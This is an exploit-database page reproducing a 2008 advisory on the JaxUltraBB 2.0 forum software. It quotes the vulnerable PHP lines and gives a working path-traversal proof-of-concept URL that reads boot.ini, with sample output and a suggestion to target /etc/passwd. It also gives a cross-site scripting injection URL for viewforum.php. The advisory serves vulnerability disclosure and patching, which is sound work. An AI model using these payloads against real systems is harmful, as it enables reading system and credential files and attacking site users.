JaxUltraBB - exploit.company

vendor:

JaxUltraBB

by:

CWH Underground

8.8

CVSS

HIGH

Local File Inclusion and Remote XSS

22, 79

CWE

Product Name: JaxUltraBB

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: a:jaxultrabb:jaxultrabb:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2008

JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities

JaxUltraBB is vulnerable to Local File Inclusion and Remote XSS. An attacker can exploit this vulnerability by sending a crafted URL to the vulnerable application. The crafted URL contains malicious code which is executed on the vulnerable application. This can lead to the disclosure of sensitive information or execution of malicious code on the vulnerable application.

Mitigation:

The application should validate user input and filter out any malicious code. The application should also be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

===============================================================
  JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
===============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 20 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : JaxUltraBB
 VERSION     : <= 2.0
 DOWNLOAD    : http://downloads.sourceforge.net/jubb/
#####################################################

--- Local File Inclusion ---

-----------------------------------
 Vulnerable File [viewprofile.php]
-----------------------------------
@Line 8-9

   8: $userfile = file_get_contents("users/".$_GET['user'].".JaxSQL");
   9: $onlinefile = file_get_contents("users/".$_GET['user']."online.JaxSQL");

--------------
 POC Exploits
--------------

[+] http://192.168.24.25/jubb/viewprofile.php?user=../../../../../../../../boot.ini%00


    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS.


--- Remote XSS Exploit ---

---------------------------------
 Vulnerable File [viewforum.php]
---------------------------------

@Line 

  14: $forum = $_GET['forum'];

  15: online_moved("Viewing ".$_GET['forum']);

  17: $forumfile = fopen("topics/".$forum."topics.JaxSQL", "at");
  18: $topicsfile = file_get_contents("topics/".$forum."topics.JaxSQL", "at");
  19: echo "<br><br><br><table><td background='img/header1.jpg' width='1000' align='center'>$forum</td><tr><td bgColor='darkblue'>";

---------
 Exploit
---------

[+] http://[Target]/[jubb_path]/viewforum.php?forum=<XSS>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-20]